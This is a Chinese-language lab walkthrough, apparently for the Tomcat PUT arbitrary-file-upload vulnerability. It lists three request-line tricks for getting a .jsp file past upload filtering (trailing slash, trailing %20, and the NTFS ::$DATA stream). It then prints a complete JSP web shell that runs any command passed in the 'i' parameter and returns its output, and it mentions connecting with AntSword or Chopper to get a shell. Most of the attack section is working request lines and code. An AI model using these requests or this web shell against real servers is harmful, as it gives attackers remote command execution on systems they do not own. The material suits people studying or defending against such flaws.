打开靶场如图
根据提示,可以使用PUT方法上传任意文件,于是抓包
将其传给Repeater
将头修改为PUT,并上传jsp文件,注意上传的时候一般jsp都是不被允许上传的,所以我们需要绕过,主要有三种方法
注意!!!!PUT后面要有空格!!!!否则行不通!!!!
法一:
使用斜杠/,斜杠在文件名中是非法的,所以会被去除(Linux和Windows)
PUT /x.jsp/ HTTP/1.1
法二:
使用空格%20,在Windows下不允许文件以空格结尾,因此上传到windows会被自动去掉末尾空格
PUT /x.jsp%20 HTTP/1.1
法三:
使用NTFS流,也是在Windows中适用的
PUT /x.jsp::$DATA HTTP/1.1
然后来看看文件是否上传成功了
成功!!
那么接下来就可以上传更花哨的马了
上传jsp木马后门
<%
java.io.InputStream in =
Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>
上传之后就可以用那些连接了
这里扩展,查看请求头的命令为OPTIONS
通过命令i=ls可以查看自己的马是否上传成功了
话题回来,上传完大马之后在蚁剑或者菜刀上GetShell
像这样